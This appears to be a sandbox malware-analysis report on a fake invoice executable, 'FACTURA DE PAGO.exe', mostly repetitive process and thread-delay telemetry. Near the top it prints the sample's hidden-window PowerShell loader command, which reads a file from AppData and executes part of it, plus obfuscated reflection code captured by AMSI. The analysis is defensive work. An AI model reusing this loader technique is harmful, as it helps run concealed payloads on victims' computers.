Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Cateringens $Sukkersygebehandling $datomrkningens), (Cashewnd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flommefedts = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Prsidiums)), $pushfully).DefineDynamicModule($Srejes, $false).DefineType($Histolaborants, $Omadresserendes, [System.MulticastDelegate]

Suspicious powershell command line found

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00BCCA78 push eax; mov dword ptr [esp], edx	1_2_00BCCA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072759F9 push edi; retf	1_2_072759FA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE29E0 push eax; ret	4_2_20EE3CA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE3C90 push eax; ret	4_2_20EE3CA5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599885	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593954	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7112			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2588			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028	Thread sleep count: 939 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599885s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028	Thread sleep count: 8870 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598704s >= -30000s	Jump to behavior
